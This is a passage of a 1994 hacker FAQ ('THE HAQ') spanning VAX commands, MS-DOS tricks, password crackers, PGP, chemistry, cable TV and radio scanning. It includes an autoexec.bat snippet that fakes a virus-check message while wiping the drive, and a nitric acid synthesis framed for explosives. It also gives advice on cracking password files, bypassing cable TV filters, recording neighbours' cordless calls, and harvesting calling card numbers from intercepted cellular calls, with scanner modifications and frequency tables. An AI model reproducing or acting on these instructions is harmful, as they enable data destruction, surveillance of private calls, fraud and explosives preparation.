TYPE: display file on terminal (same as DOS ‘type’ and UNIX ‘cat’)
SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags
usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext
options- WORLD, GROUP, or SYSTEM can be used in place of OWNER
WORLD = all users in your world
GROUP = all users in your group
SYSTEM = all users with SYSPRV privileges
SET TERMINAL: controls terminal settings
usage- SET TERMINAL/option
options- WIDTH=80 = set width to 80 columns
ADVANCED_VIDEO = selects 124×24 lines
NOADVANCED_VIDEO = unselects 124×24 lines
ANSI_CRT = selects ANSI escape sequences
NOANSI_CRT = unselects ANSI escape sequences
AUTOBAUD = allows computer to select highest possible
baud rate
NOAUTOBAUD = turn off automatic baud selection
BROADCAST = allows receipt of SEND, MAIL and PHONE
messages
NOBROADCAST = prevents receiption of SEND, MAIL and
PHONE messages
DEVICE_TYPE=VT220 = set terminal type to VT-220
ECHO = enables echoing from DCL command line
NOECHO = disable DCL command line echoing
FULLDUP = enable full duplex
NOFULLDUP = disable full duplex
HANGUP = log off if no carrier
NOHANGUP = don’t log off even if no carrier
INQUIRE = show device type of terminal
PAGE=43 = set display length to 43 lines
TYPE_AHEAD = enable type ahead function
NOTYPE_AHEAD = disable type ahead function
UNKNOWN = use for ASCII device types
WRAP = set wrap around feature
NOWRAP = unset wrap around feature

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE COMMON VAX FILENAME EXTENSIONS?

COMPILER SOURCE CODE FILES
==========================
ADA = ADA compiler source code file
BAS = BASIC compiler source code file
B32 = BLISS-32 compiler source code file
C = C compiler source code file
COB = COBOL compiler source code file
FOR = FORTRAN compiler source code file
MAR = MACRO compiler source code file
PAS = PASCAL compiler source code file
PLI = PL/I compiler source code file
OBJ = object code created by compiler before linking

DCL LANGUAGE FILES
==================
CLD = DCL command description file
COM = DCL batch file

GENERAL FILES
=============
DAT = DATa file
DIR = subDIRectory file
EXE = EXEcutable program
HLP = text for HeLP libraries
LIS = system listing files (TYPE, PRINT, PHOTO)
LOG = batch job output
MEM = DSR output file
RNO = DSR source file
SIXEL = file for SIXEL graphics
SYS = SYStem image file
TJL = Trouble JournaL
TMP = TeMPorary file
TXT = text library input file
UAF = User Autorization File

MAIL FILES
==========
DIS = DIStribution file
MAI = MAIl message file
TXT = mail output file

EDT EDITOR FILES
================
EDT = command file for the EDT editor
JOU = EDT journal when problems occur
TPU = editor command file

=====================================================================
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)

HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities. I am pretty sure that executing this
program, using the proper command line options, you can for one
better than formatting the hard drive. Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero…or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table. If you
just delete a file, or format a hard drive…with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WRITING A .bat FILE TO ‘WIPE’ A DRIVE.
Add the following code to the end of autoexec.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while …
wipe > nothing.txt

This prevents any output from Wipe being output.

=====================================================================
X. Finding out what that encrypted info is
(Cracking programs)

WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs. They are Crack, Cracker Jack
and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386. To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account. They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET THESE PROGRAMS?

Crack: ftp.virginia.edu /pub/security
CrackerJack: bnlux1.bnl.gov /pub/pezz
COPS:

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP. It works. It’s
dictionary, but it works. Not all that well, as you may have to sift
through multiple possible passwords, but its better than nothing.

=====================================================================
XI. How do I keep my info secure
(PGP / Cryptology)

WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS,
Unix, and Mac. You create a key pair. One private (secret) key
and a public key. The keys are different parts of the whole. I
distribute my public key and anyone who wants can grab it ad it to
their PGP keyring. Then when they want to send me a message they
encrypt it with PGP and my public key and then send it. Only I can
decrypt it because you need my secret key to decode it. (Trust me
you won’t get my secret key) That is PGP. Please use it if you
want to communicate anything of a ahhhh….sensitive manner.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET PGP?
(from an archie search)

FTP sites for PGP=Pretty Good Privacy Public Encryption System
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

========
Unix PGP
========

Host 130.149.17.7
Location: /pub/local/ini/security
FILE -rw-rw-r– 651826 Apr 5 1993 pgp22.tar.Z

Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
FILE -r–r–r– 651826 Mar 7 1993 pgp22.tar.Z

Host coombs.anu.edu.au
Location: /pub/security/cypher
FILE -r–r–r– 651826 Nov 4 22:28 pgp22.tar.Z

==========
MS-DOS PGP
==========

Host zero.cypher.com
Location: /pub/pgp
FILE pgp23a.zip

================
MS-DOS PGP SHELL
================

Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
FILE -rw-r–r– 65160 Aug 9 20:00 pgpshe22.zip

Host nic.switch.ch
Location: /mirror/msdos/security
FILE -rw-rw-r– 65160 Aug 9 22:00 pgpshe22.zip

Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
FILE -rw-r–r– 65430 Nov 26 18:28 pgpshe22.zip

=======
Mac PGP
=======

Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
FILE -r–r–r– 323574 Apr 26 1993 pgp.hqx

Host sics.se
Location: /pub/info-mac/util
FILE -rw-rw-r– 323574 Nov 5 11:20 pgp.hqx

Host sumex-aim.stanford.edu
Location: /info-mac/util
FILE -rw-r–r– 323574 Apr 26 1993 pgp.hqx

=====================================================================
XII. Chemistry 101
(explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
(Underground electronics)
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
XV. What’s on the radio waves?
(Radios and Scanning)

HOW TO MAKE NITRIC ACID:
(from Neurophire)

Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses. Purchases can be traced.(From TBBOM13.TXT)

There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!

Materials: Equipment:
———- ———-
sodium nitrate or adjustable heat source
potassium nitrate
retort
distilled water
ice bath
concentrated
sulfuric acid stirring rod

collecting flask with
stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.

2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly. If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.

3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.

4) Begin heating the retort, using low heat. Continue heating until
liquid begins to come out of the end of the retort. The liquid that
forms is nitric acid. Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed. This can result in the
production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.

Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one liter of boiling water. Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.

=====================================================================
XIII. Fun things with solder, wires, and parts
(Underground electronics)

HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE?
(from Angel of Death with Belisarius)

The idea is to make a simple timing circuit to create a high freq
tone. The timing circuit is based upon the 555-chip and uses a
simple speaker to convert the pulses from the 555 into sound.

Required materials: 555 timer chip, 9 V battery, .01 uF capacitor,
100k potentiometer, tweeter speaker, wire
(the capacitor and resistor values can vary
although that changes the possible freqs)

-9V (GND)
[\ |
[s\ | ________ ________
[p \ | | \/ |
[e +——-+——————-+–| 1 8 |– +9V
[a | | | |
[k | | | /.01uF CAP | 5 |
[e +-+ +–|(——+———–| 2 5 7 |
[r / | | \ | | 5 |
[ / | | | |
[/ +————— | ———-| 3 t 6 |—-+
| | | i | |
| | | m | |
| | +9V –| 4 e 5 | |
| | | r | |
| | |__________________| |
| | |
| /\ | |
+—-\ / \—–+———————————–+
\/ 100k POT

555 Timer Pin Connections
————————-
Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead
of capacitor
Pin 2: Pin 6 and other lead of capacitor
Pin 3: Other lead of the tweeter, one lead of the resistor
Pin 4: Pin 8 and the +9V
Pin 5: No connections
Pin 6: Pin 2 and the other lead of the potentiometer
Pin 7: No connections
Pin 8: Pin 4 and the +9V

=====================================================================
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)

HOW IS CABLE TV SCRAMBLED?
(from Aero)

There are three main types of scrambling for cable TV: trap filters,
gernaral scrambling and addressable scrambling.

1. Trap filters. Located in the distribution box and physically
prevent the desired channel from reaching your house. All you see
when this techniques is used is theoretically static (i.e. a blank
channel). No filter is perfect, so some signal may reach your TV.
This is an older system of cable protection, and it is easy to bypass
(go out to the box and remove the filter).

2. General scrambling. This system scrambles the pay channels (all
the channels before they reach the box), and you need a special
decoder to unscramble them. The most common method of scambling is
to remove the sync signal. This is also easy to get around as you
can buy descramblers.

3. Addressable descramblers. The cable box receives the scrambled
channels, but the cable company sends signals to the box telling it
which ones should be unscrambled. This is the system used by most
pay-per-view systems. This is a little harder to defeat, but not too
bad if you have the right equipment/friends.

-=-=-=-=-=-=-=-=-=-=-=-=-=- END of THE HAQ2.07/2 -=-=-=-=-=-=-=-=-=-=-=-

**

Jun 13, 1994 19:54 from Belisarius

_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***

+—————+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+—————+

File 3 of 3

=====================================================================
XV. Tuning in to what’s on the radio waves
(Radios and Scanning)

WHAT DO I NEED TO START SCANNING?
There are to type of main scanner types (determined by the method of
radio reception): either crystal or programmable(synthetic) tuning.
Crystal tuning requires a specific crystal for each desired freq, at

====== ===============
1 46.610
2 46.630
3 46.670
4 46.710
5 46.730
6 46.770
7 46.830
8 46.870
9 46.930
10 46.970

The range on cordless phones is usually only a block or two. To
monitor someones calls use a small portable scanner and cassette
recorder and you will have a tape of all their calls.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I SCAN CELLULAR PHONE CONVERSATIONS?
Cellular telephones are a great source of info as they are used by
doctors, lawyers, and other big business. They are also a great
source of calling card numbers.

Cellular phones operate on a very simple premise. They receive on
one frequency and transmit on another freq in order to allow
simultaneous communication. The area is split into two bands
(Band A and Band B) which are split into 21 cells (hence the name
cellular) and each cell has 16 channels within it.

Cellular arrangment:

______ ______
/ \ / \
/ \ / \
/ Cell \______/ Cell \______
\ #1 / \ #5 / \
\ / \ / \
\______/ Cell \______/ Cell \
/ \ #3 / \ #7 /
/ \ / \ /
/ Cell \______/ Cell \______/
\ #2 / \ #6 / \
\ / \ / \
\______/ Cell \______/ Cell \
/ \ #4 / \ #8 /

Band A uses channels 1-333 and Band B uses channels 334-666. Usually
the first channel in each cell is the Data Channel (333 for Cell 1A,
331 for Cell 2A, etc.). There are simple formulas to calculate the
frequency for receive and transmit for each channel.

Transmit freq = (channel number * .030 MHz) + 870 MHz

Receive freq = (channel number * .030 MHz) + 825 MHz

So for Channel 333: T=879.990 MHz and R=834.990 MHz

FOR BAND A
==========
Cell #
Chan 1 2 3 4 5 6 7

1 333 332 331 330 329 328 327
879.990 879.960 879.930 879.900 879.870 879.840 879.810
834.990 834.960 834.930 834.900 834.870 834.840 834.810

2 312 311 310 309 308 307 306
879.360 879.330 879.300 879.270 879.240 879.210 879.180
834.360 834.330 834.300 834.270 834.240 834.210 834.180

3 291 290 289 288 287 286 285
878.730 878.700 878.670 878.640 878.610 878.580 878.550
833.730 833.700 833.670 833.640 833.610 833.580 833.550

4 270 269 268 267 266 265 264
878.100 878.070 878.040 878.010 877.980 877.950 877.920
833.100 833.070 833.040 833.010 832.980 832.950 832.920

5 249 248 247 246 245 244 243
877.470 877.440 877.410 877.380 877.350 877.320 877.290
832.470 832.440 832.410 832.380 832.350 832.320 832.290

6 228 227 226 225 224 223 222
876.840 876.810 876.780 876.750 876.720 876.690 876.660
831.840 831.810 831.780 831.750 831.720 831.690 831.660

7 207 206 205 204 203 202 201
876.210 876.180 876.150 876.120 876.090 876.060 876.030
831.210 831.180 831.150 831.120 831.090 831.060 831.030

8 186 185 184 183 182 181 180
875.580 875.550 875.520 875.490 875.460 875.430 875.400
830.580 830.550 830.520 830.490 830.460 830.430 830.400

9 165 164 163 162 161 160 159
874.950 874.920 874.890 874.860 874.830 874.800 874.770
829.950 829.920 829.890 829.860 829.830 829.800 829.770

10 144 143 142 141 140 139 138
874.320 874.290 874.260 874.230 874.200 874.170 874.140
829.320 829.290 829.260 829.230 829.200 829.170 829.140

11 123 122 121 120 119 118 117
873.690 873.660 873.630 873.600 873.570 873.540 873.510
828.690 828.660 828.630 828.600 828.570 828.540 828.510

12 102 101 100 99 98 97 96
873.060 873.030 873.000 872.970 872.940 872.910 872.880
828.060 828.030 828.000 827.970 827.940 827.910 827.880

13 81 80 79 78 77 76 75
872.430 872.400 872.370 872.340 872.310 872.280 872.250
827.430 827.400 827.370 827.340 827.310 827.280 827.250

14 60 59 58 57 56 55 54
871.800 871.770 871.740 871.710 871.680 871.650 871.620
826.800 826.770 826.740 826.710 826.680 826.650 826.620

15 39 38 37 36 35 34 33
871.170 871.140 871.110 871.080 871.050 871.020 870.990
826.170 826.140 826.110 826.080 826.050 826.020 825.990

16 18 17 16 15 14 13 12
870.540 870.510 870.480 870.450 870.420 870.390 870.360
825.540 825.510 825.480 825.450 825.420 825.390 825.360

Cell #
Chan 8 9 10 11 12 13 14

1 326 325 324 323 322 321 320
879.780 879.750 879.720 879.690 879.660 879.630 879.600
834.780 834.750 834.720 834.690 834.660 834.630 834.600

2 305 304 303 302 301 300 299
879.150 879.120 879.090 879.060 879.030 879.000 878.970
834.150 834.120 834.090 834.060 834.030 834.000 833.970

3 284 283 282 281 280 279 278
878.520 878.490 878.460 878.430 878.400 878.370 878.340
833.520 833.490 833.460 833.430 833.400 833.370 833.340

4 263 262 261 260 259 258 257
877.890 877.860 877.830 877.800 877.770 877.740 877.710
832.890 832.860 832.830 832.800 832.770 832.740 832.710

5 242 241 240 239 238 237 236
877.260 877.230 877.200 877.170 877.140 877.110 877.080
832.260 832.230 832.200 832.170 832.140 832.110 832.080

6 221 220 219 218 217 216 215
876.630 876.600 876.570 876.540 876.510 876.480 876.450
831.630 831.600 831.570 831.540 831.510 831.480 831.450

7 200 199 198 197 196 195 194
876.000 875.970 875.940 875.910 875.880 875.850 875.820
831.000 830.970 830.940 830.910 830.880 830.850 830.820

8 179 178 177 176 175 174 173
875.370 875.340 875.310 875.280 875.250 875.220 875.190
830.370 830.340 830.310 830.280 830.250 830.220 830.190

9 158 157 156 155 154 153 152
874.740 874.710 874.680 874.650 874.620 874.590 874.560
829.740 829.710 829.680 829.650 829.620 829.590 829.560

10 137 136 135 134 133 132 131
874.110 874.080 874.050 874.020 873.990 873.960 873.930
829.110 829.080 829.050 829.020 828.990 828.960 828.930

11 116 115 114 113 112 111 110
873.480 873.450 873.420 873.390 873.360 873.330 873.300
828.480 828.450 828.420 828.390 828.360 828.330 828.300

12 95 94 93 92 91 90 89
872.850 872.820 872.790 872.760 872.730 872.700 872.670
827.850 827.820 827.790 827.760 827.730 827.700 827.670

13 74 73 72 71 70 69 68
872.220 872.190 872.160 872.130 872.100 872.070 872.040
827.220 827.190 827.160 827.130 827.100 827.070 827.040

14 53 52 51 50 49 48 47
871.590 871.560 871.530 871.500 871.470 871.440 871.410
826.590 826.560 826.530 826.500 826.470 826.440 826.410

15 32 31 30 29 28 27 26
870.960 870.930 870.900 870.870 870.840 870.810 870.780
825.960 825.930 825.900 825.870 825.840 825.810 825.780

16 11 10 9 8 7 6 5
870.330 870.300 870.270 870.240 870.210 870.180 870.150
825.330 825.300 825.270 825.240 825.210 825.180 825.150

Cell #
Chan 15 16 17 18 19 20 21

1 319 318 317 316 315 314 313
879.570 879.540 879.510 879.480 879.450 879.420 879.390
834.570 834.540 834.510 834.480 834.450 834.420 834.390

2 298 297 296 295 294 293 292
878.940 878.910 878.880 878.850 878.820 878.790 878.760
833.940 833.910 833.880 833.850 833.820 833.790 833.760

3 277 276 275 274 273 272 271
878.310 878.280 878.250 878.220 878.190 878.160 878.130
833.310 833.280 833.250 833.220 833.190 833.160 833.130

4 256 255 254 253 252 251 250
877.680 877.650 877.620 877.590 877.560 877.530 877.500
832.680 832.650 832.620 832.590 832.560 832.530 832.500

5 235 234 233 232 231 230 229
877.050 877.020 876.990 876.960 876.930 876.900 876.870
832.050 832.020 831.990 831.960 831.930 831.900 831.870

6 214 213 212 211 210 209 208
876.420 876.390 876.360 876.330 876.300 876.270 876.240
831.420 831.390 831.360 831.330 831.300 831.270 831.240

7 193 192 191 190 189 188 187
875.790 875.760 875.730 875.700 875.670 875.640 875.610
830.790 830.760 830.730 830.700 830.670 830.640 830.610

8 172 171 170 169 168 167 166
875.160 875.130 875.100 875.070 875.040 875.010 874.980
830.160 830.130 830.100 830.070 830.040 830.010 829.980

9 151 150 149 148 147 146 145
874.530 874.500 874.470 874.440 874.410 874.380 874.350
829.530 829.500 829.470 829.440 829.410 829.380 829.350

10 130 129 128 127 126 125 124
873.900 873.870 873.840 873.810 873.780 873.750 873.720
828.900 828.870 828.840 828.810 828.780 828.750 828.720

11 109 108 107 106 105 104 103
873.270 873.240 873.210 873.180 873.150 873.120 873.090
828.270 828.240 828.210 828.180 828.150 828.120 828.090

12 88 87 86 85 84 83 82
872.640 872.610 872.580 872.550 872.520 872.490 872.460
827.640 827.610 827.580 827.550 827.520 827.490 827.460

13 67 66 65 64 63 62 61
872.010 871.980 871.950 871.920 871.890 871.860 871.830
827.010 826.980 826.950 826.920 826.890 826.860 826.830

14 46 45 44 43 42 41 40
871.380 871.350 871.320 871.290 871.260 871.230 871.200
826.380 826.350 826.320 826.290 826.260 826.230 826.200

15 25 24 23 22 21 20 19
870.750 870.720 870.690 870.660 870.630 870.600 870.570
825.750 825.720 825.690 825.660 825.630 825.600 825.570

16 4 3 2 1
870.120 870.090 870.060 870.030
825.120 825.090 825.060 825.030

FOR BAND B
==========

Cell #
Chan 1 2 3 4 5 6 7

1 334 335 336 337 338 339 340
880.020 880.050 880.080 880.110 880.140 880.170 880.200
835.020 835.050 835.080 835.110 835.140 835.170 835.200

2 355 356 357 358 359 360 361
880.650 880.680 880.710 880.740 880.770 880.800 880.830
835.650 835.680 835.710 835.740 835.770 835.800 835.830

3 376 377 378 379 380 381 382
881.280 881.310 881.340 881.370 881.400 881.430 881.460
836.280 836.310 836.340 836.370 836.400 836.430 836.460

4 397 398 399 400 401 402 403
881.910 881.940 881.970 882.000 882.030 882.060 882.090
836.910 836.940 836.970 837.000 837.030 837.060 837.090

5 418 419 420 421 422 423 424
882.540 882.570 882.600 882.630 882.660 882.690 882.720
837.540 837.570 837.600 837.630 837.660 837.690 837.720

6 439 440 441 442 443 444 445
883.170 883.200 883.230 883.260 883.290 883.320 883.350
838.170 838.200 838.230 838.260 838.290 838.320 838.350

7 460 461 462 463 464 465 466
883.800 883.830 883.860 883.890 883.920 883.950 883.980
838.800 838.830 838.860 838.890 838.920 838.950 838.980

8 481 482 483 484 485 486 487
884.430 884.460 884.490 884.520 884.550 884.580 884.610
839.430 839.460 839.490 839.520 839.550 839.580 839.610

9 502 503 504 505 506 507 508
885.060 885.090 885.120 885.150 885.180 885.210 885.240
840.060 840.090 840.120 840.150 840.180 840.210 840.240

10 523 524 525 526 527 528 529
885.690 885.720 885.750 885.780 885.810 885.840 885.870
840.690 840.720 840.750 840.780 840.810 840.840 840.870

11 544 545 546 547 548 549 550
886.320 886.350 886.380 886.410 886.440 886.470 886.500
841.320 841.350 841.380 841.410 841.440 841.470 841.500

12 565 566 567 568 569 570 571
886.950 886.980 887.010 887.040 887.070 887.100 887.130
841.950 841.980 842.010 842.040 842.070 842.100 842.130

13 586 587 588 589 590 591 592
887.580 887.610 887.640 887.670 887.700 887.730 887.760
842.580 842.610 842.640 842.670 842.700 842.730 842.760

14 607 608 609 610 611 612 613
888.210 888.240 888.270 888.300 888.330 888.360 888.390
843.210 843.240 843.270 843.300 843.330 843.360 843.390

15 628 629 630 631 632 633 634
888.840 888.870 888.900 888.930 888.960 888.990 889.020
843.840 843.870 843.900 843.930 843.960 843.990 844.020

16 649 650 651 652 653 654 655
889.470 889.500 889.530 889.560 889.590 889.620 889.650
844.470 844.500 844.530 844.560 844.590 844.620 844.650

Cell #
Chan 8 9 10 11 12 13 14

1 341 342 343 344 345 346 347
880.230 880.260 880.290 880.320 880.350 880.380 880.410
835.230 835.260 835.290 835.320 835.350 835.380 835.410

2 362 363 364 365 366 367 368
880.860 880.890 880.920 880.950 880.980 881.010 881.040
835.860 835.890 835.920 835.950 835.980 836.010 836.040

3 383 384 385 386 387 388 389
881.490 881.520 881.550 881.580 881.610 881.640 881.670
836.490 836.520 836.550 836.580 836.610 836.640 836.670

4 404 405 406 407 408 409 410
882.120 882.150 882.180 882.210 882.240 882.270 882.300
837.120 837.150 837.180 837.210 837.240 837.270 837.300

5 425 426 427 428 429 430 431
882.750 882.780 882.810 882.840 882.870 882.900 882.930
837.750 837.780 837.810 837.840 837.870 837.900 837.930

6 446 447 448 449 450 451 452
883.380 883.410 883.440 883.470 883.500 883.530 883.560
838.380 838.410 838.440 838.470 838.500 838.530 838.560

7 467 468 469 470 471 472 473
884.010 884.040 884.070 884.100 884.130 884.160 884.190
839.010 839.040 839.070 839.100 839.130 839.160 839.190

8 488 489 490 491 492 493 494
884.640 884.670 884.700 884.730 884.760 884.790 884.820
839.640 839.670 839.700 839.730 839.760 839.790 839.820

9 509 510 511 512 513 514 515
885.270 885.300 885.330 885.360 885.390 885.420 885.450
840.270 840.300 840.330 840.360 840.390 840.420 840.450

10 530 531 532 533 534 535 536
885.900 885.930 885.960 885.990 886.020 886.050 886.080
840.900 840.930 840.960 840.990 841.020 841.050 841.080

11 551 552 553 554 555 556 557
886.530 886.560 886.590 886.620 886.650 886.680 886.710
841.530 841.560 841.590 841.620 841.650 841.680 841.710

12 572 573 574 575 576 577 578
887.160 887.190 887.220 887.250 887.280 887.310 887.340
842.160 842.190 842.220 842.250 842.280 842.310 842.340

13 593 594 595 596 597 598 599
887.790 887.820 887.850 887.880 887.910 887.940 887.970
842.790 842.820 842.850 842.880 842.910 842.940 842.970

14 614 615 616 617 618 619 620
888.420 888.450 888.480 888.510 888.540 888.570 888.600
843.420 843.450 843.480 843.510 843.540 843.570 843.600

15 635 636 637 638 639 640 641
889.050 889.080 889.110 889.140 889.170 889.200 889.230
844.050 844.080 844.110 844.140 844.170 844.200 844.230

16 656 657 658 659 660 661 662
889.680 889.710 889.740 889.770 889.800 889.830 889.860
844.680 844.710 844.740 844.770 844.800 844.830 844.860

Cell #
Chan 15 16 17 18 19 20 21

1 348 349 350 351 352 353 354
880.440 880.470 880.500 880.530 880.560 880.590 880.620
835.440 835.470 835.500 835.530 835.560 835.590 835.620

2 369 370 371 372 373 374 375
881.070 881.100 881.130 881.160 881.190 881.220 881.250
836.070 836.100 836.130 836.160 836.190 836.220 836.250

3 390 391 392 393 394 395 396
881.700 881.730 881.760 881.790 881.820 881.850 881.880
836.700 836.730 836.760 836.790 836.820 836.850 836.880

4 411 412 413 414 415 416 417
882.330 882.360 882.390 882.420 882.450 882.480 882.510
837.330 837.360 837.390 837.420 837.450 837.480 837.510

5 432 433 434 435 436 437 438
882.960 882.990 883.020 883.050 883.080 883.110 883.140
837.960 837.990 838.020 838.050 838.080 838.110 838.140

6 453 454 455 456 457 458 459
883.590 883.620 883.650 883.680 883.710 883.740 883.770
838.590 838.620 838.650 838.680 838.710 838.740 838.770

7 474 475 476 477 478 479 480
884.220 884.250 884.280 884.310 884.340 884.370 884.400
839.220 839.250 839.280 839.310 839.340 839.370 839.400

8 495 496 497 498 499 500 501
884.850 884.880 884.910 884.940 884.970 885.000 885.030
839.850 839.880 839.910 839.940 839.970 840.000 840.030

9 516 517 518 519 520 521 522
885.480 885.510 885.540 885.570 885.600 885.630 885.660
840.480 840.510 840.540 840.570 840.600 840.630 840.660

10 537 538 539 540 541 542 543
886.110 886.140 886.170 886.200 886.230 886.260 886.290
841.110 841.140 841.170 841.200 841.230 841.260 841.290

11 558 559 560 561 562 563 564
886.740 886.770 886.800 886.830 886.860 886.890 886.920
841.740 841.770 841.800 841.830 841.860 841.890 841.920

12 579 580 581 582 583 584 585
887.370 887.400 887.430 887.460 887.490 887.520 887.550
842.370 842.400 842.430 842.460 842.490 842.520 842.550

13 600 601 602 603 604 605 606
888.000 888.030 888.060 888.090 888.120 888.150 888.180
843.000 843.030 843.060 843.090 843.120 843.150 843.180

14 621 622 623 624 625 626 627
888.630 888.660 888.690 888.720 888.750 888.780 888.810
843.630 843.660 843.690 843.720 843.750 843.780 843.810

15 642 643 644 645 646 647 648
889.260 889.290 889.320 889.350 889.380 889.410 889.440
844.260 844.290 844.320 844.350 844.380 844.410 844.440

16 663 664 665 666
889.890 889.920 889.950 889.980
844.890 844.920 844.950 844.980

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I MODIFY MY SCANNER TO RECEIVE CELLULAR?
1. Buy an older scanner before they stopped them from receiving the
necessary freqs (look at garage sales)
2. For a Realistic PRO-2004 open the case and cut one leg of D-513.
3. For a Realistic PRO-2005 open the case and cut one leg of D-502.
4. For a PRO-34 and PRO-37 cut D11 to return access to 824-851 MHz
and 869-896 MHz.
5. Get the “Scanner Modification Handbook” volumes I and II by Bill
Cheek from Comunications Electronics Inc. (313)996-8888.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I FIND THE FREQS USED BY POLICE, FIRE, ETC?

There are books available at Radio Shack for about $8 that list all
of the freqs used by area.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

NOW THAT I AM LISTENING TO THE COPS, WHAT DO THE CODES MEAN?

10-00 Series Code

10-0 Exercise great caution.
10-1 Reception is poor.
10-2 Reception is good.
10-3 Stop transmitting.
10-4 Message received.
10-5 Relay message.
10-6 Change channel.
10-7 Out of service/unavailable for assignment.
10-7A Out of service at home.
10-7B Out of service – personal.
10-7OD Out of service – off duty
10-8 In service/available for assignment.
10-9 Repeat last transmission.
10-10 Off duty.
10-10A Off duty at home.
10-11 Identify this frequency.
10-12 Visitors are present (be discrete).
10-13 Advise weather and road conditions.
10-14 Citizen holding suspect.
10-15 Prisoner in custody.
10-16 Pick up prisoner.
10-17 Request for gasoline.
10-18 Equipment exchange.
10-19 Return/returning to the station.
10-20 Location?
10-21 Telephone:______
10-21A Advise home that I will return at ______.
10-21B Phone your home
10-21R Phone radio dispatch
10-22 Disregard the last assignment.
10-22C Leave area if all secure; responsible person/owner is
enroute.
10-23 Standby.
10-24 Request car-to-car transmission.
10-25 Do you have contact with _______?
10-26 Clear.
10-27 Driver’s license check.
10-28 Vehicle registration request.
10-29 Check wants/warrants.[vehicle] (PIN,SVS)
10-29a Check wants/warrants [subject] (PIN)
10-29c Check complete [subject]
10-29f The subject is wanted for a felony.
10-29h Caution – severe hazard potential.
10-29r Check wants/record [subject (PIN,CJIC)
10-29m The subject is wanted for a misdemeanor.
10-29v The vehicle is wanted in connection with a possible crime.
10-30 Does not conform to regulations.
10-32 Drowning.
10-33 Alarm sounding.
10-34 Assist at office.
10-35 Time check.
10-36 Confidential information.
10-37 Identify the operator.
10-39 Can ______ come to the radio?
10-40 Is ______ available for a telephone call?
10-42 Check on the welfare of/at ______.
10-43 Call a doctor.
10-45 What is the condition of the patient?
